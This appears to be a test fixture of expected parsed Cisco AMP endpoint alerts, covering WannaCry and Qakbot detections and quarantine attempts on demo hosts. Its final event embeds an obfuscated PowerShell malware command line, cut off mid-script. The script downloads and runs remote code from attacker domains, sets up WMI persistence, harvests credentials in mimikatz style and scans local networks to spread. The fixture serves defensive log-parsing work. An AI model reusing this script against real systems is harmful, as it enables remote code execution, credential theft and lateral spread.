"file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 21869, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 716000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 23112, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + 
], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 718000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 24355, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + 
} + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264039066533964", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 765000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25559, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419264039066533964", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 749000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + 
"event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "54a116ff80df6e6031059fc3036464df", + "file.hash.sha1": "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 26683, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "54a116ff80df6e6031059fc3036464df", + "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 702000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "54a116ff80df6e6031059fc3036464df", + "file.hash.sha1": "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3", + "file.hash.sha256": 
"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 28003, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "54a116ff80df6e6031059fc3036464df", + "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336648", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 729000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 29323, + "related.hash": [ + 
"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336647", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 729000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 30524, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": 
"10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336646", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 713000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 31725, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336647", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", + 
"event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "kepv86368.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 32926, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336646", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "uqlq0o884.exe", + "file.path": 
"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 34182, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336645", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "120C.tmp", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 35438, + 
"related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336644", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 183000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "2f99e3456dc1d26f77c52b2119fde92f", + "file.hash.sha1": "92673dd0e5f4a094fa6cd57bb301f884f2289f6c", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 36775, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "2f99e3456dc1d26f77c52b2119fde92f", + "92673dd0e5f4a094fa6cd57bb301f884f2289f6c" + ], 
+ "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:14:44.000Z", + "cisco.amp.bp_data.audit": false, + "cisco.amp.bp_data.details.actions": [ + { + "action": "end_process", + "end_ts": 1602033881808, + "params": [ + "10724" + ], + "start_ts": 1602033881805, + "status": "success" + } + ], + "cisco.amp.bp_data.details.eng_epoch": 1, + "cisco.amp.bp_data.details.eng_ver": "0.9.0.104", + "cisco.amp.bp_data.details.matched_activity.events": [ + { + "process:start": { + "app": "powershell.exe", + "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "args": [ + "powershell.exe", + "-NoP", + "-NonI", + "-W", + "Hidden", + "-E", + "$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
